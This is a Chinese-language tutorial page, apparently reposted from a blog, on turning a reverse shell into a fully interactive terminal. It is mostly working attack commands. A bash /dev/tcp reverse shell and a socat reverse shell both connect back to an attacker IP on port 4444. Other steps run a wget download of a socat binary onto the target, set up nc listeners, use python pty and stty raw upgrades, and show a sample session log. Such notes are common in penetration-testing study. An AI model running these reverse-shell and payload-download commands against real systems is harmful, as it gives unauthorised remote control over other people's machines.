ICode9

精准搜索请尝试: 精确搜索
首页 > 系统相关> 文章详细

交互式shell

2021-08-26 23:01:03  阅读:279  来源: 互联网

标签:tty shell 交互式 socat 4444 pty ubuntu bash


一、学习链接传送门

https://saucer-man.com/information_security/233.html

二、命令记录

1、python pth方式

python -c 'import pty; pty.spawn("/bin/bash")'

2、升级nc为完全交互

攻击机本地执行
首先检查当前终端和STTY信息
$ echo $TERM      
$ stty -a 
nc开启监听
$ nc -lvvp 4444

目标机执行
$ bash -i >& /dev/tcp/192.168.81.160/4444 0>&1

接着运行如下一堆命令:
# 此时攻击机已经获取到了bash
# 接下来执行
$ python -c 'import pty; pty.spawn("/bin/bash")'  //启用python交互式
# 把它丢到后台挂起
$ ctrl + z   
# 重置stty,也就意味着你看不到输入的内容
$ stty raw -echo  
# 把后台挂起的程序调回前台
$ fg  
# 完全刷新终端屏幕
$ reset  
# 接下来设置环境变量,根据第一步得到的环境变量来设置
$ export SHELL=bash   
$ export TERM=xterm-256color   
$ stty rows 行数 columns 列数  

3、使用socat

攻击机:
首先安装
$ sudo apt install socat
执行
$ socat file:`tty`,raw,echo=0 tcp-listen:4444

目标机:
把socat上传到目标机器上或者直接下载
$ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
运行
$ chmod +x /tmp/socat
$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.81.160:4444

4、script获取pty

C:\Users\w5023
λ nc -lvvp 4444
listening on [any] 4444 ...
connect to [192.168.2.134] from DESKTOP-IBUUT6H.lan [192.168.2.134] 30567
ubuntu@ubuntu:~$ tty
tty
not a tty
ubuntu@ubuntu:~$ script /dev/null
script /dev/null
Script started, file is /dev/null
ubuntu@ubuntu:~$ tty
tty
/dev/pts/1

标签:tty,shell,交互式,socat,4444,pty,ubuntu,bash
来源: https://www.cnblogs.com/sakura521/p/15191976.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有